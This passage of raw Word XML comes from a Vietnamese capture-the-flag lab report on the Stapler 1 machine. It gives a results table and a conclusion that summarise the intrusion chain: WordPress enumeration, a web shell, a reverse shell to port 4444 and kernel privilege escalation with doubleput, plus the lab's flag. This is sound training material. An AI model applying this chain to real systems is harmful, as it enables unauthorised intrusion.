          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="3107564"/>
            <wp:docPr id="14" name="Picture 14"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(399).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="3107564"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 21. Đọc flag.txt và hoàn thành bài lab Stapler 1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Bảng tổng hợp kết quả</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sz w:val="20"/>
              </w:rPr>
              <w:t>Nội dung kiểm tra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="1F4E78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Kết quả thực tế</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="1F4E78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nhận xét</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phát hiện web HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cổng 12380 hoạt động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Đường dẫn /blogblog/ và /phpmyadmin/ được xác định.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>WordPress enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>WPScan thu thập được thông tin người dùng/plugin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cung cấp dữ liệu cho bước truy cập web.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Web shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>shell.php thực thi hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hostname trả về red.initech.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Reverse shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kết nối từ 192.168.56.107 về Kali cổng 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Quyền ban đầu www-data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hệ điều hành/kernel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ubuntu 16.04 LTS, kernel 4.4.0-21-generic i686</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phù hợp với exploit trong bài học.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Leo quyền</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>doubleput tạo root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Xác nhận uid=0(root).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>b6b545dc11b7a270f4bad23432190c75162c4a2b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Bài lab hoàn thành.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Kết luận</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Bài lab Stapler 1 đã được hoàn thành đầy đủ trong môi trường máy ảo được cấp phép. Quá trình thực hành minh họa chuỗi kiểm thử từ dò quét dịch vụ, enumeration web/WordPress, truy cập ban đầu qua web shell, thiết lập reverse shell, xác định phiên bản hệ thống đến khai thác lỗ hổng kernel để leo thang đặc quyền root và thu thập flag cuối cùng.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